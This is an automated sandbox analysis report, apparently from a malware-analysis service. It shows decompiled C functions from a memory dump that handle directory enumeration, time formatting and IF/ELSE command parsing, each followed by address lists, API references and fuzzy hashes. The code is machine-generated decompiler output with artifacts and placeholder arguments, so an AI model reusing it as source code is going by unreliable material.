				_t126 = _t124 - _t145 >> 1;
				_t79 = (_t124 - _t145 >> 1) - 2;
				_v1164 = _t79;
				 *_t157 = _t79;
				_t80 = GetFileAttributesW(__ecx);
				if(_t80 == 0xffffffff) {
					_push(0);
					_push(GetLastError());
					E0033C5A2(_t126);
					goto L10;
				}
				if((_t80 & 0x00000010) != 0) {
					_t129 = _t119;
					_t146 =  &(_t129[1]);
					do {
						_t83 =  *_t129;
						_t129 =  &(_t129[1]);
					} while (_t83 != 0);
					_t131 = _t129 - _t146 >> 1;
					_t84 = 0x5c;
					_push(0x2a);
					if( *((intOrPtr*)(_t119 + _t131 * 2 - 2)) != _t84) {
						 *((short*)(_t119 + 4 + _t131 * 2)) = 0;
						_pop(_t145);
					} else {
						_t145 = 0;
						_pop(_t84);
					}
					_t119[_t131] = _t84;
					 *(_t119 + 2 + _t131 * 2) = _t145;
					_t86 = FindFirstFileW(_t119,  &_v1144);
					_v1156 = _t86;
					if(_t86 != 0xffffffff) {
						_t154 = 1;
						do {
							_t131 = ".";
							_t87 =  &(_v1144.cFileName);
							while(1) {
								_t145 =  *_t87;
								if(_t145 !=  *_t131) {
									break;
								}
								if(_t145 == 0) {
									L26:
									_t88 = 0;
									L28:
									if(_t88 == 0) {
										goto L57;
									}
									_t131 = L"..";
									_t96 =  &(_v1144.cFileName);
									while(1) {
										_t145 =  *_t96;
										if(_t145 !=  *_t131) {
											break;
										}
										if(_t145 == 0) {
											L34:
											_t97 = 0;
											L36:
											if(_t97 == 0) {
												goto L57;
											}
											_t134 =  &(_v1144.cFileName);
											_t145 = _t134 + 2;
											do {
												_t98 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t98 != _v1148);
											_t135 = _t134 - _t145;
											_t131 = _t135 >> 1;
											if(_t135 == 0) {
												goto L57;
											}
											if((_v1144.dwFileAttributes & 0x00000010) != 0) {
												_t99 =  *_t157;
												if(_t99 <= _t131) {
													_t99 = _t131;
												}
												 *_t157 = _t99;
												goto L57;
											}
											_v28 = 1;
											_v32 = 0;
											_v24 = 0x104;
											memset( &_v552, 0, 0x104);
											_t161 = _t161 + 0xc;
											if(E00340C70( &_v552, ((0 | _v28 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
												SetLastError(8);
												L60:
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												L61:
												_t157 = GetLastError();
												FindClose(_v1156);
												if(_t154 != 0) {
													goto L10;
												}
												if(_t157 == 0x12) {
													goto L7;
												}
												_push(0);
												goto L64;
											}
											E00340D89(_t145, _t119);
											_t148 = _v32;
											_t138 = _t148;
											if(_t148 == 0) {
												_t138 =  &_v552;
											}
											_t159 = _t138 + 2;
											do {
												_t110 =  *_t138;
												_t138 = _t138 + 2;
											} while (_t110 != _v1148);
											_t140 = _t138 - _t159 >> 1;
											if(_t148 == 0) {
												_t148 =  &_v552;
											}
											 *((short*)(_t148 + _t140 * 2 - 2)) = 0;
											E00340CF2(_t148,  &(_v1144.cFileName));
											_t142 = _v32;
											if(_v32 == 0) {
												_t142 =  &_v552;
											}
											_t145 = _v24;
											if(E0033B89C(_t142, _v24,  &_v1160) == 0) {
												goto L60;
											} else {
												_t157 = _v1152;
												_t144 = _v1164 + _v1160;
												_t116 =  *_t157;
												if(_t116 <= _t144) {
													_t116 = _t144;
												}
												 *_t157 = _t116;
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												goto L57;
											}
										}
										_t145 =  *((intOrPtr*)(_t96 + 2));
										_t33 = _t131 + 2; // 0x2e
										if(_t145 !=  *_t33) {
											break;
										}
										_t96 = _t96 + 4;
										_t131 = _t131 + 4;
										if(_t145 != 0) {
											continue;
										}
										goto L34;
									}
									asm("sbb eax, eax");
									_t97 = _t96 | 0x00000001;
									goto L36;
								}
								_t145 =  *((intOrPtr*)(_t87 + 2));
								_t30 = _t131 + 2; // 0x200000
								if(_t145 !=  *_t30) {
									break;
								}
								_t87 = _t87 + 4;
								_t131 = _t131 + 4;
								if(_t145 != 0) {
									continue;
								}
								goto L26;
							}
							asm("sbb eax, eax");
							_t88 = _t87 | 0x00000001;
							goto L28;
							L57:
							_t154 = FindNextFileW(_v1156,  &_v1144);
						} while (_t154 != 0);
						goto L61;
					} else {
						_t157 = GetLastError();
						FindClose(0xffffffff);
						if(_t157 == 2 || _t157 == 0x12) {
							goto L7;
						} else {
							_push(0);
							L64:
							_push(_t157);
							E0033C5A2(_t131);
							_t76 = 0;
							goto L8;
						}
					}
				}
				L7:
				_t76 = 1;
				goto L8;
			}

0x0033b89c
0x0033b8a7
0x0033b8ae
0x0033b8b5
0x0033b8b7
0x0033b8be
0x0033b8c3
0x0033b8c9
0x0033b8cc
0x0033b8cc
0x0033b8cf
0x0033b8d2
0x0033b8d9
0x0033b8e0
0x00349da8
0x00349da8
0x0033b928
0x0033b92b
0x0033b938
0x0033b938
0x0033b8e6
0x0033b8ea
0x0033b8ed
0x0033b8ed
0x0033b8f0
0x0033b8f3
0x0033b8f8
0x0033b900
0x0033b903
0x0033b906
0x0033b90c
0x0033b90e
0x0033b917
0x00349d99
0x00349da0
0x00349da1
0x00000000
0x00349da7
0x0033b91f
0x00349daf
0x00349db1
0x00349db4
0x00349db4
0x00349db7
0x00349dba
0x00349dc1
0x00349dc5
0x00349dc6
0x00349dcd
0x00349dd6
0x00349ddb
0x00349dcf
0x00349dcf
0x00349dd1
0x00349dd1
0x00349ddc
0x00349de8
0x00349ded
0x00349df3
0x00349dfc
0x00349e28
0x00349e29
0x00349e29
0x00349e2e
0x00349e34
0x00349e34
0x00349e3a
0x00000000
0x00000000
0x00349e3f
0x00349e56
0x00349e56
0x00349e5f
0x00349e61
0x00000000
0x00000000
0x00349e67
0x00349e6c
0x00349e72
0x00349e72
0x00349e78
0x00000000
0x00000000
0x00349e7d
0x00349e94
0x00349e94
0x00349e9d
0x00349e9f
0x00000000
0x00000000
0x00349ea5
0x00349eab
0x00349eae
0x00349eae
0x00349eb1
0x00349eb4
0x00349ebd
0x00349ebf
0x00349ec1
0x00000000
0x00000000
0x00349ece
0x00349fb6
0x00349fba
0x00349fbc
0x00349fbc
0x00349fbe
0x00000000
0x00349fbe
0x00349ed6
0x00349edf
0x00349eea
0x00349eee
0x00349efb
0x00349f14
0x00349fe1
0x00349fe7
0x00349fea
0x00349ff0
0x00349ff1
0x00349ffd
0x00349fff
0x0034a007
0x00000000
0x00000000
0x0034a010
0x00000000
0x00000000
0x0034a018
0x00000000
0x0034a018
0x00349f21
0x00349f26
0x00349f29
0x00349f2d
0x00349f2f
0x00349f2f
0x00349f35
0x00349f38
0x00349f38
0x00349f3b
0x00349f3e
0x00349f49
0x00349f4d
0x00349f4f
0x00349f4f
0x00349f57
0x00349f69
0x00349f6e
0x00349f73
0x00349f75
0x00349f75
0x00349f7b
0x00349f8c
0x00000000
0x00349f8e
0x00349f8e
0x00349f9a
0x00349fa0
0x00349fa4
0x00349fa6
0x00349fa6
0x00349fab
0x00349fad
0x00349fb3
0x00000000
0x00349fb3
0x00349f8c
0x00349e7f
0x00349e83
0x00349e87
0x00000000
0x00000000
0x00349e89
0x00349e8c
0x00349e92
0x00000000
0x00000000
0x00000000
0x00349e92
0x00349e98
0x00349e9a
0x00000000
0x00349e9a
0x00349e41
0x00349e45
0x00349e49
0x00000000
0x00000000
0x00349e4b
0x00349e4e
0x00349e54
0x00000000
0x00000000
0x00000000
0x00349e54
0x00349e5a
0x00349e5c
0x00000000
0x00349fc0
0x00349fd3
0x00349fd5
0x00000000
0x00349dfe
0x00349e06
0x00349e08
0x00349e11
0x00000000
0x00349e20
0x00349e20
0x0034a019
0x0034a019
0x0034a01a
0x0034a020
0x00000000
0x0034a022
0x00349e11
0x00349dfc
0x0033b925
0x0033b927
0x00000000

APIs

GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FE7,00000000), ref: 0033B90E

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0a964d8696f8b180936df6157bbce4ae899eb833e0f179db8dff089db489d895
Instruction ID: 75b585c7502197c357318455c4164fab4f486568da2981e33c14cef387328816
Opcode Fuzzy Hash: 0a964d8696f8b180936df6157bbce4ae899eb833e0f179db8dff089db489d895
Instruction Fuzzy Hash: EE9101729001068BDF26DB64CC857BBB3F9EF54310F1545AADA4ADB250EB31AE85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 003396A0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 237
timeCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E003396A0(void* __ecx, void* __edx, signed int _a4, unsigned int _a8) {
				signed int _v8;
				short _v76;
				short _v332;
				signed short _v334;
				signed short _v336;
				signed int _v338;
				signed int _v340;
				struct _SYSTEMTIME _v348;
				signed int _v352;
				intOrPtr _v356;
				void* _v360;
				struct _FILETIME _v368;
				struct _FILETIME _v376;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				char* _t67;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed short _t80;
				signed int _t85;
				signed int _t88;
				signed int _t92;
				signed int _t99;
				void* _t106;
				void* _t111;
				signed int _t112;
				signed int _t114;
				void* _t116;
				void* _t119;
				signed int _t121;
				signed int _t122;
				void* _t123;
				signed int _t124;
				signed int _t126;
				signed int _t127;
				intOrPtr* _t131;
				void* _t133;
				int _t134;
				void* _t136;
				signed int _t138;
				signed int _t140;
				signed int _t141;
				void* _t142;

				_t58 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t58 ^ _t141;
				_t139 = _a4;
				_t136 = __edx;
				if(__ecx != 0) {
					E00353C49(__ecx,  &_v368);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v368);
				}
				FileTimeToLocalFileTime( &_v368,  &_v376);
				FileTimeToSystemTime( &_v376,  &_v348);
				if(_t136 != 1) {
					__eflags =  *0x373cc9;
					if( *0x373cc9 == 0) {
						__eflags =  *0x35d0cc;
						_t67 = "a";
						_t114 = _v340 & 0x0000ffff;
						if( *0x35d0cc == 0) {
							_t67 = " ";
						} else {
							__eflags = _t114 - 0xc;
							if(__eflags < 0) {
								__eflags = _t114;
								if(_t114 == 0) {
									_t114 = 0xc;
								}
							} else {
								if(__eflags > 0) {
									__eflags = _t114;
								}
								_t67 = "p";
							}
						}
						_push(_t67);
						_push(_v338 & 0x0000ffff);
						_push(0x35f81c);
						E0034274C( &_v76, 0x20, L"%02d%s%02d%s", _t114);
						L48:
						__eflags = _t139;
						if(_t139 != 0) {
							_t130 = _a8;
							E00341040(_t139, _a8,  &_v76);
							_t116 = _t139 + 2;
							do {
								_t73 =  *_t139;
								_t139 = _t139 + 2;
								__eflags = _t73;
							} while (_t73 != 0);
							goto L6;
						}
						_t131 =  &_v76;
						_t119 = _t131 + 2;
						do {
							_t76 =  *_t131;
							_t131 = _t131 + 2;
							__eflags = _t76;
						} while (_t76 != 0);
						_t130 = _t131 - _t119 >> 1;
						_t74 = E00342616( &_v76, _t131 - _t119 >> 1);
						goto L7;
					}
					_v352 = 0;
					_t79 = GetLocaleInfoW(E003441A4(), 0x1003,  &_v332, 0x80);
					__eflags = _t79;
					if(_t79 != 0) {
						L20:
						_t80 = _v332;
						_t136 =  &_v332;
						__eflags = _t80;
						if(_t80 == 0) {
							L37:
							_t85 = GetTimeFormatW(E003441A4(), 2,  &_v348,  &_v332,  &_v76, 0x20);
							__eflags = _t85;
							if(_t85 == 0) {
								_v76 = _t85;
							}
							goto L48;
						}
						_t112 = _t80 & 0x0000ffff;
						_t121 = 0;
						__eflags = 0;
						do {
							__eflags = _t112 - 0x27;
							if(_t112 != 0x27) {
								__eflags = _t121;
								if(_t121 == 0) {
									__eflags = _t112 - 0x68;
									if(_t112 == 0x68) {
										L29:
										_t122 = 0;
										__eflags = 0;
										do {
											_t136 = _t136 + 2;
											_t122 = _t122 + 1;
											__eflags =  *_t136 - _t112;
										} while ( *_t136 == _t112);
										_t133 = _t136 +  ~_t122 * 2;
										_v360 = _t133;
										_t136 = _t133 + 2;
										__eflags = _t122 - 1;
										if(_t122 != 1) {
											L35:
											_t121 = _v352;
											goto L36;
										}
										_t123 = _t133;
										_v356 = _t123 + 2;
										do {
											_t92 =  *_t123;
											_t123 = _t123 + 2;
											__eflags = _t92;
										} while (_t92 != 0);
										_t124 = _t123 - _v356;
										__eflags = _t124;
										memmove(_t136, _t133, 2 + (_t124 >> 1) * 2);
										_t142 = _t142 + 0xc;
										 *_v360 = _t112;
										goto L35;
									}
									__eflags = _t112 - 0x48;
									if(_t112 == 0x48) {
										goto L29;
									}
									__eflags = _t112 - 0x6d;
									if(_t112 != 0x6d) {
										goto L36;
									}
									goto L29;
								}
								_t136 = _t136 + 2;
								goto L36;
							}
							_t136 = _t136 + 2;
							__eflags = _t121;
							_t121 = 0 | _t121 == 0x00000000;
							_v352 = _t121;
							L36:
							_t88 =  *(_t136 + 2) & 0x0000ffff;
							_t136 = _t136 + 2;
							_t112 = _t88;
							__eflags = _t88;
						} while (_t88 != 0);
						goto L37;
					}
					_t126 =  &_v332;
					_t134 = 0x80;
					_t138 = L"HH:mm:ss t" - _t126;
					__eflags = _t138;
					while(1) {
						_t25 = _t134 + 0x7fffff7e; // 0x7ffffffe
						__eflags = _t25;
						if(_t25 == 0) {
							break;
						}
						_t99 =  *(_t138 + _t126) & 0x0000ffff;
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						 *_t126 = _t99;
						_t126 = _t126 + 2;
						_t134 = _t134 - 1;
						__eflags = _t134;
						if(_t134 != 0) {
							continue;
						}
						L18:
						_t126 = _t126 - 2;
						__eflags = _t126;
						L19:
						__eflags = 0;
						 *_t126 = 0;
						goto L20;
					}
					__eflags = _t134;
					if(_t134 != 0) {
						goto L19;
					}
					goto L18;
				} else {
					_t127 = _v334 & 0x0000ffff;
					_t130 = 0xcccccccd * _t127 >> 0x20 >> 3;
					_push(0xcccccccd * _t127 >> 0x20 >> 3);
					_push(0x35f7fc);
					_push(_v336 & 0x0000ffff);
					_push(0x35f81c);
					_push(_v338 & 0x0000ffff);
					_push(0x35f81c);
					_push(_v340 & 0x0000ffff);
					_push(L"%2d%s%02d%s%02d%s%02d");
					if(_t139 == 0) {
						_t74 = E003425D9();
						L7:
						return E00346FD0(_t74, _t111, _v8 ^ _t141, _t130, _t136, _t139);
					} else {
						_push(_a8);
						_push(_t139);
						E0034274C();
						_t116 = _t139 + 2;
						do {
							_t106 =  *_t139;
							_t139 = _t139 + 2;
						} while (_t106 != 0);
						L6:
						_t140 = _t139 - _t116;
						_t139 = _t140 >> 1;
						_t74 = _t140 >> 1;
						goto L7;
					}
				}
			}

0x003396ab
0x003396b2
0x003396b7
0x003396bb
0x003396bf
0x00350ad6
0x003396c5
0x003396cc
0x003396e0
0x003396e0
0x003396f4
0x00339708
0x00339711
0x00350aed
0x00350af4
0x00350c53
0x00350c5a
0x00350c5f
0x00350c66
0x00350c84
0x00350c68
0x00350c68
0x00350c6b
0x00350c79
0x00350c7b
0x00350c7d
0x00350c7d
0x00350c6d
0x00350c6d
0x00350c6f
0x00350c6f
0x00350c72
0x00350c72
0x00350c6b
0x00350c89
0x00350c91
0x00350c92
0x00350ca3
0x00350cab
0x00350cab
0x00350cad
0x00350cd1
0x00350cda
0x00350cdf
0x00350ce2
0x00350ce2
0x00350ce5
0x00350ce8
0x00350ce8
0x00000000
0x00350ced
0x00350caf
0x00350cb2
0x00350cb5
0x00350cb5
0x00350cb8
0x00350cbb
0x00350cbb
0x00350cc5
0x00350cc7
0x00000000
0x00350cc7
0x00350b05
0x00350b1b
0x00350b21
0x00350b23
0x00350b65
0x00350b65
0x00350b6c
0x00350b72
0x00350b75
0x00350c27
0x00350c43
0x00350c49
0x00350c4b
0x00350c4d
0x00350c4d
0x00000000
0x00350c4b
0x00350b7b
0x00350b7e
0x00350b7e
0x00350b80
0x00350b80
0x00350b84
0x00350b9a
0x00350b9c
0x00350ba3
0x00350ba7
0x00350bb5
0x00350bb5
0x00350bb5
0x00350bb7
0x00350bb7
0x00350bba
0x00350bbb
0x00350bbb
0x00350bc4
0x00350bc7
0x00350bcd
0x00350bd0
0x00350bd3
0x00350c0f
0x00350c0f
0x00000000
0x00350c0f
0x00350bd5
0x00350bda
0x00350be0
0x00350be0
0x00350be3
0x00350be6
0x00350be6
0x00350beb
0x00350beb
0x00350bfd
0x00350c09
0x00350c0c
0x00000000
0x00350c0c
0x00350ba9
0x00350bad
0x00000000
0x00000000
0x00350baf
0x00350bb3
0x00000000
0x00000000
0x00000000
0x00350bb3
0x00350b9e
0x00000000
0x00350b9e
0x00350b88
0x00350b8b
0x00350b90
0x00350b92
0x00350c15
0x00350c15
0x00350c19
0x00350c1c
0x00350c1e
0x00350c1e
0x00000000
0x00350b80
0x00350b25
0x00350b32
0x00350b37
0x00350b37
0x00350b39
0x00350b39
0x00350b3f
0x00350b41
0x00000000
0x00000000
0x00350b43
0x00350b47
0x00350b4a
0x00000000
0x00000000
0x00350b4c
0x00350b4f
0x00350b52
0x00350b52
0x00350b55
0x00000000
0x00000000
0x00350b5d
0x00350b5d
0x00350b5d
0x00350b60
0x00350b60
0x00350b62
0x00000000
0x00350b62
0x00350b59
0x00350b5b
0x00000000
0x00000000
0x00000000
0x00339717
0x00339717
0x0033972c
0x0033972f
0x00339730
0x00339735
0x0033973d
0x00339742
0x0033974a
0x0033974f
0x00339750
0x00339757
0x00350ae0
0x00339781
0x00339791
0x0033975d
0x0033975d
0x00339760
0x00339761
0x00339769
0x00339770
0x00339770
0x00339773
0x00339776
0x0033977b
0x0033977b
0x0033977d
0x0033977f
0x00000000
0x0033977f
0x00339757

APIs

GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0035F830,?,00002000), ref: 003396CC
SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 003396E0
FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 003396F4
FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00339708
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 00350B1B
GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 00350C43

Strings

HH:mm:ss t, xrefs: 00350B2B
%02d%s%02d%s, xrefs: 00350C98
%2d%s%02d%s%02d%s%02d, xrefs: 00339750

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Time$File$System$FormatInfoLocalLocale
String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
API String ID: 55602301-2516506544
Opcode ID: 1831742bbc60932b822726cee4fb664332e1b134db3035102f657a20360633cf
Instruction ID: a37f031164f7708b60da4628eb829b07410cc054a792628f7a8820ebba304ec8
Opcode Fuzzy Hash: 1831742bbc60932b822726cee4fb664332e1b134db3035102f657a20360633cf
Instruction Fuzzy Hash: 4981D575900219DBCB2A9B54CC85FFA73BCEF45706F05429AEC0AAB560E7319E89CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0033D803, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212
COMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E0033D803(void* __eax, WCHAR* __ebx, void* __ecx) {
				void* __edi;
				void* __esi;
				short _t56;
				short _t57;
				signed int _t59;
				intOrPtr* _t62;
				intOrPtr _t63;
				signed int _t66;
				signed int _t68;
				signed int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				signed int _t76;
				void* _t81;
				signed int _t85;
				signed int _t86;
				WCHAR* _t90;
				signed int _t91;
				void* _t92;
				WCHAR* _t93;
				signed int _t100;
				WCHAR* _t104;
				void* _t105;
				void* _t110;
				void* _t114;
				signed int _t118;
				signed int _t125;
				WCHAR* _t132;
				void* _t138;
				signed int _t140;
				void* _t144;
				void* _t150;
				void* _t156;
				WCHAR* _t157;
				void* _t160;
				signed int _t162;
				signed int _t165;
				signed int _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				signed int _t171;
				signed int _t173;
				void* _t174;
				signed int _t175;
				signed int _t177;
				signed int _t180;

				_t104 = __ebx;
				_t157 = 0;
				__imp___wcsicmp(L"IF/?", 0x36faa0, _t156, _t170, __ecx);
				_t186 = __eax;
				if(__eax == 0) {
					 *0x36faa4 = 0;
					_t157 = 1;
				}
				_t110 = 0x2c;
				_t171 = E0033E9A0(_t110, _t186);
				if(_t157 != 0) {
					_t56 = 0x2f;
					 *0x36faa0 = _t56;
					_t57 = 0x3f;
					 *0x36faa2 = _t57;
					 *0x36faa4 = 0;
				} else {
					E0033F030(0);
				}
				_t149 = 0x2c;
				_t59 = E0033DCE1(_t104, _t149, _t157);
				if(_t59 != 0) {
					 *(_t171 + 0x38) =  *(_t171 + 0x38) & 0x00000000;
					 *_t171 = 0x3c;
					goto L13;
				} else {
					_t160 = 0;
					if( *0x373cc9 == _t59) {
						L6:
						_t149 = 0;
						E0033F300(_t59, 0, 0, 0);
					} else {
						__imp___wcsicmp(0x36faa0, L"/I");
						if(_t59 == 0) {
							_t160 = 1;
						} else {
							goto L6;
						}
					}
					_t62 = E0033CDA2(0);
					 *((intOrPtr*)(_t171 + 0x3c)) = _t62;
					if(_t62 != 0 && _t160 != 0) {
						__eflags =  *_t62 - 0x38;
						if( *_t62 == 0x38) {
							_t62 =  *((intOrPtr*)(_t62 + 0x3c));
						}
						 *((intOrPtr*)(_t62 + 0x40)) = 2;
					}
					_t114 = 0x2c;
					_t63 = E0033DC74(_t104, _t114);
					 *((intOrPtr*)(_t171 + 0x40)) = _t63;
					if(_t63 == 0) {
						E003582EB(_t114);
					}
					if(E0033EEC8() == 0) {
						L13:
						return _t171;
					} else {
						_t66 = E0033F030(0);
						__imp___wcsicmp(L"ELSE", 0x36faa0);
						if(_t66 == 0) {
							_t118 =  *0x36fa8c +  *0x36fa8c;
							_t68 = E003400B0(_t118);
							__eflags = _t68;
							if(_t68 == 0) {
								E00359287(_t118);
								__imp__longjmp(0x36b8b8, 1);
								asm("int3");
								while(1) {
									L58:
									 *((short*)(_t149 + _t118 * 2)) = 0;
									while(1) {
										_t71 =  *(_t171 + 0x14);
										_t171 = _t71;
										__eflags = _t71;
										if(_t71 == 0) {
											break;
										}
										_t119 =  *(_t171 + 4);
										_t162 =  *(_t171 + 4);
										_t150 = _t162 + 2;
										do {
											_t72 =  *_t162;
											_t162 = _t162 + 2;
											__eflags = _t72 - _t104;
										} while (_t72 != _t104);
										_t73 = E003422C0(_t104, _t119);
										_t149 = (_t162 - _t150 >> 1) + 1;
										E00341040( *(_t171 + 4), (_t162 - _t150 >> 1) + 1, _t73);
										__eflags =  *((intOrPtr*)(_t171 + 8)) - _t104;
										if( *((intOrPtr*)(_t171 + 8)) == _t104) {
											_t149 =  *(_t171 + 4);
											_t140 = _t149;
											_t168 = _t140 + 2;
											do {
												_t75 =  *_t140;
												_t140 = _t140 + 2;
												__eflags = _t75 - _t104;
											} while (_t75 != _t104);
											_t118 = (_t140 - _t168 >> 1) - 1;
											__eflags = _t118 - 1;
											if(_t118 > 1) {
												__eflags =  *((short*)(_t149 + _t118 * 2)) - 0x3a;
												if( *((short*)(_t149 + _t118 * 2)) == 0x3a) {
													goto L58;
												}
											}
										}
									}
									_t165 =  *(_t180 - 0x228);
									_t173 =  *(_t180 - 0x224);
									__eflags = _t173 - 3;
									if(_t173 == 3) {
										_t76 =  *0x373cd4;
										 *(_t180 - 0x228) = _t76;
										goto L33;
									} else {
										_t138 = 0x10;
										_t76 = E003400B0(_t138);
										 *(_t180 - 0x228) = _t76;
										__eflags = _t76;
										if(_t76 == 0) {
											L52:
											_t104 = 1;
										} else {
											 *(_t76 + 0xc) =  *0x373cd4;
											 *0x373cd4 = _t76;
											 *(_t76 + 8) = _t165;
											 *_t76 = _t173;
											L33:
											_t166 =  *(_t165 + 0x34);
											__eflags = _t166;
											if(_t166 != 0) {
												_t175 = _t173 | 0xffffffff;
												__eflags = _t175;
												do {
													__eflags =  *(_t166 + 8) - _t104;
													if( *(_t166 + 8) != _t104) {
														goto L48;
													} else {
														__imp___get_osfhandle( *_t166);
														__eflags = _t76 - _t175;
														if(_t76 == _t175) {
															L63:
															 *(_t166 + 8) = _t175;
															goto L41;
														} else {
															__imp___get_osfhandle( *_t166);
															__eflags = _t76 - 0xfffffffe;
															if(_t76 == 0xfffffffe) {
																goto L63;
															} else {
																_t92 = E00340178(_t76);
																__eflags = _t92;
																if(_t92 == 0) {
																	_t92 = E00359953(_t92,  *_t166);
																	__eflags = _t92;
																	if(_t92 != 0) {
																		goto L39;
																	} else {
																		__imp___get_osfhandle( *_t166, _t104, _t104, 1);
																		_pop(_t136);
																		_t92 = SetFilePointer(_t92, ??, ??, ??);
																		__eflags = _t92 - _t175;
																		if(_t92 != _t175) {
																			goto L39;
																		} else {
																			E0034274C(0x373d00, 0x104, L"%d",  *_t166);
																			_push(0x373d00);
																			_push(1);
																			_push(0x40002721);
																			goto L75;
																		}
																	}
																} else {
																	L39:
																	_t136 =  *_t166;
																	_t93 = E0033DBCE(_t92,  *_t166);
																	 *(_t166 + 8) = _t93;
																	__eflags = _t93 - _t175;
																	if(_t93 == _t175) {
																		E0034274C(0x373d00, 0x104, L"%d",  *_t166);
																		_push(0x373d00);
																		_push(1);
																		_push(0x2344);
																		L75:
																		E0033C5A2(_t136);
																		 *(_t166 + 8) = _t104;
																		E0033D937();
																		goto L52;
																	} else {
																		E0033DB92( *_t166);
																		L41:
																		_t125 =  *(_t166 + 4);
																		__eflags =  *_t125 - 0x26;
																		if( *_t125 == 0x26) {
																			 *((short*)(_t125 + 4)) = 0;
																			_t149 =  *_t166;
																			_t127 = (( *(_t166 + 4))[1] & 0x0000ffff) - 0x30;
																			_t81 = E0033DBFC((( *(_t166 + 4))[1] & 0x0000ffff) - 0x30,  *_t166);
																			__eflags = _t81 - _t175;
																			if(_t81 != _t175) {
																				goto L48;
																			} else {
																				goto L76;
																			}
																		} else {
																			__eflags =  *((short*)(_t166 + 0x10)) - 0x3c;
																			_push(_t125);
																			if( *((short*)(_t166 + 0x10)) == 0x3c) {
																				_t149 = 0x8000;
																				_t85 = E0033D120(_t125, 0x8000);
																				 *(_t180 - 0x224) = _t85;
																				__eflags = _t85 - _t175;
																				if(_t85 != _t175) {
																					goto L45;
																				} else {
																					_t90 = E00343320(L"DPATH");
																					__eflags = _t90;
																					if(_t90 == 0) {
																						goto L77;
																					} else {
																						_t132 =  *(_t180 - 0x18);
																						__eflags = _t132;
																						if(_t132 == 0) {
																							_t132 = _t180 - 0x220;
																						}
																						_t91 = SearchPathW(_t90,  *(_t166 + 4), _t104,  *(_t180 - 0x10), _t132, _t104);
																						__eflags = _t91;
																						if(_t91 == 0) {
																							goto L77;
																						} else {
																							_t125 =  *(_t180 - 0x18);
																							__eflags = _t125;
																							if(_t125 == 0) {
																								_t125 = _t180 - 0x220;
																							}
																							_push(_t125);
																							_t149 = 0x8000;
																							goto L44;
																						}
																					}
																				}
																			} else {
																				asm("sbb edx, edx");
																				_t149 = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
																				__eflags = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
																				L44:
																				_t85 = E0033D120(_t125, _t149);
																				 *(_t180 - 0x224) = _t85;
																				__eflags = _t85 - _t175;
																				if(_t85 == _t175) {
																					L77:
																					E0033D937();
																					E0035985A( *0x373cf0);
																					goto L52;
																				} else {
																					L45:
																					__eflags = _t85 -  *_t166;
																					if(_t85 !=  *_t166) {
																						_t149 =  *_t166;
																						_t86 = E0033DBFC(_t85,  *_t166);
																						_t127 =  *(_t180 - 0x224);
																						_t177 = _t86;
																						E0033DB92( *(_t180 - 0x224));
																						__eflags = _t177 - 0xffffffff;
																						if(_t177 == 0xffffffff) {
																							L76:
																							E0033D937();
																							E0034274C(0x373d00, 0x104, L"%d",  *_t166);
																							E0033C5A2(_t127, 0x2344, 1, 0x373d00);
																							goto L52;
																						} else {
																							_t85 =  *_t166;
																							_t175 = _t177 | 0xffffffff;
																							goto L46;
																						}
																					} else {
																						L46:
																						__eflags = _t85 - _t175;
																						if(_t85 == _t175) {
																							goto L77;
																						} else {
																							 *( *(_t180 - 0x228) + 4) = _t85;
																							goto L48;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
													goto L49;
													L48:
													_t76 =  *(_t166 + 0x14);
													_t166 = _t76;
													__eflags = _t76;
												} while (_t76 != 0);
											}
										}
									}
									L49:
									__imp__??_V@YAXPAX@Z( *(_t180 - 0x18));
									_pop(_t167);
									_pop(_t174);
									__eflags =  *(_t180 - 4) ^ _t180;
									_pop(_t105);
									return E00346FD0(_t104, _t105,  *(_t180 - 4) ^ _t180, _t149, _t167, _t174);
									goto L78;
								}
							} else {
								 *(_t171 + 0x44) = _t68;
								E00341040(_t68,  *0x36fa8c, 0x36faa0);
								_t144 = 0x2c;
								_t100 = E0033DC74(_t104, _t144);
								 *(_t171 + 0x48) = _t100;
								__eflags = _t100;
								if(_t100 == 0) {
